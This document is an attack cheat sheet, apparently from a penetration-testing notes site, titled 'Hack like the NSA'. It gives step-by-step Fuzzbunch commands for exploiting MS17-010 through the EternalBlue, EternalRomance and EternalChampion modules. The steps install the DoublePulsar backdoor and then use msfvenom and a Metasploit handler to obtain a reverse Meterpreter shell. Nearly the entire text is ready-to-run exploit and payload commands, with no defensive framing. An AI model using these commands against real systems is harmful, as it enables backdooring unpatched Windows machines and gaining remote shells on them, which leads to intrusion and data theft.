MS17-010

Hack like the NSA by exploiting the MS17-010 vulnerability.

Table of Contents

Fuzzbunch

Discover Vulnerable Targets
use Smbtouch
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/NBT>
execute

Write down the available pipe names and exploits.

Eternal Blue

This module is fully automated and generates and injects the DoublePulsar backdoor by itself. Once the backdoor is installed on the target system, it can be used to run a reverse Meterpreter shell.

Generate and Inject DoublePulsar backdoor using EternalBlue:

use EternalBlue
set TargetIP <IP>
set TargetPort <Port>
set Target <XP/WIN72K8R2>
execute

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute

Eternal Romance

First, generate shellcode with DoublePulsar. The output file (.bin) containing the shellcode is then used by the EternalRomance exploit to infect the target with the DoublePulsar backdoor. Once the backdoor is installed on the target system, it can be used to run a reverse Meterpreter shell.

Generate DoublePulsar shellcode:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function OutputInstall
set OutputFile C:\workspace\doublepulsar.bin
execute

Inject DoublePulsar backdoor using EternalRomance:

use EternalRomance
set TargetIP <IP>
set TargetPort <Port>
set ShellcodeFile C:\workspace\doublepulsar.bin
set PipeName <accessible pipe name from smbtouch>
set Protocol <SMB/NBT>
set Target <use tab completion to select target>
execute

Running touch within the EternalRomance module invokes Smbtouch and populates the module variables automatically.

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute

Eternal Champion

First, generate shellcode with DoublePulsar. The output file (.bin) contains the shellcode that the EternalChampion exploit uses to infect the target with the DoublePulsar backdoor. Once the backdoor is installed on the target system, it can be used to run a reverse Meterpreter shell.

Generate DoublePulsar shellcode:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function OutputInstall
set OutputFile C:\workspace\doublepulsar.bin
execute

Convert DoublePulsar shellcode to its string hex representation:

bin-to-shellcode.py <PATH TO BIN> > <OUTPUT FILE>

Source: bin-to-shellcode.py

Warning

bin-to-shellcode.py is available in C:\fuzzbunch on the custom NSA Windows XP virtual machine.

Alternatively, use the following PowerShell one-liner:

PS C:\> [String]::Join('', (Get-Content <PATH TO BIN> -Encoding Byte | foreach {([Convert]::ToString($_, 16)).PadLeft(2, '0')}))

Inject DoublePulsar backdoor using EternalChampion. This exploit abuses a race condition and will not work every time, even if the target is vulnerable.

use EternalChampion
set TargetIP <IP>
set TargetPort <Port>
set ShellcodeBuffer <Shellcode>
set PipeName <accessible pipe name from smbtouch>
set Protocol <SMB/NBT>
set Target <use tab completion to select target>
set TargetOsArchitecture <x86/x64>
execute

Select mode FB to run the exploit or DANE to generate the corresponding malicious DLL.

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute
References